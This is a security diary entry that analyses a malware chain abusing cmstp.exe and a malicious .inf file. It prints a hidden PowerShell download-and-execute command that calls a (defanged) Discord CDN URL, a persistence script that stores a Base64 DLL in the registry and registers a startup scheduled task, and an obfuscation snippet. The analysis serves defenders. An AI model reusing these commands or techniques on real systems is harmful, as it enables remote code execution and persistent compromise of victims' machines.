Microsoft has used “.inf” files for a while[1]. They are simple text files and contain setup information in a driver package. They describe what must be performed to install a driver package on a device. When you read them, the syntax is straightforward to understand. The file is based on sections that describe what must be performed. One of them is very interesting for attackers: [RunPreSetupCommandsSection]. Note that .inf files cannot be executed “as is”.

The malicious file I found has the following section:

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hiDden iex ((New-Object System.Net.WebClient).DownloadString('hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119347463023759521/task.ps1'))
taskkill /IM CMsTp.exe /F

The payload ‘task.ps1’ contains the following code:

$webContent = Invoke-WebRequest -Uri "hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119333871213879356/get.txt"
New-Item -Path "HKCU:\Software\lath3";
Set-ItemProperty -Path "HKCU:\Software\lath3" -Name "lath2" -Force -Value $webContent.Content;
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-w hiDden $you=[Convert]::FromBase64String((gp "HKCU:\Software\lath3").lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()'
$trigger =  New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -RunLevel Highest Force -Trigger $trigger -TaskName "Demo" -Description "Shane"

The payload ‘get.txt’ contains a Base64-encoded executable that will be decoded and loaded by Powershell. It’s a DLL with a VT score of 31/70 (SHA256:15b97c5182a30d4c85b31835b44d978dc065892587a7656038575bd32a62ac32).

The PowerShell script can be categorized as "fileless" because it saves the payload in a registry key (HKCU:\Software\lath3\lath2) and creates a scheduled task to implement persistence. The PowerShell script will be launched every time the compromised host reboots. 

They are interesting information in the .inf file:

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"

The file is called 'cmstp.inf'. cmstp.exe is a LOLbin, provided by Microsoft tool for managing Connection Provider service profiles[2]. It can handle .inf files like this:

cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf

Here is the parent PowerShell script named uas32.ps1 (SHA256:20295311db1228935ddbba18678c88db78b4fc7efb54d2853cfb801851de0e19). It is obfuscated with a classic technique:

(NEw-Object MAnaGEMENt.auToMAtiON.psCreDENTIaL  ' ', ( ' ... <payload> ... ' |coNVertTO-SEcUrEStrinG -ke (13..28))).GETNetwOrkCrEDentIal().PAsSWORD |Iex

I don't cover the complete script because it's not relevant. The interesting part is the following:

. Set-INFFile
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
If (Test-Path $InfFileLocation) {
#Command to run
$ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
$ps.Arguments = "/au $InfFileLocation"
$ps.UseShellExecute = $false

The initial script will dump the file 'cmstp.inf' on disk and invoke cmstp.exe as described above. It is delivered to the victim in a CAB file (SHA256:fb4f92adc2a9c920ce9a77d1f66050c69728d1f3773c02f9da42e7809fb10d1c)

To resume, we have this flow of infection:

CAB file -> uas32.ps1 -> cmstp.exe with cmstp.inf -> Scheduled task -> Malicious DLL

[1] https://learn.microsoft.com/en-us/windows-hardware/drivers/install/overview-of-inf-files
[2] https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key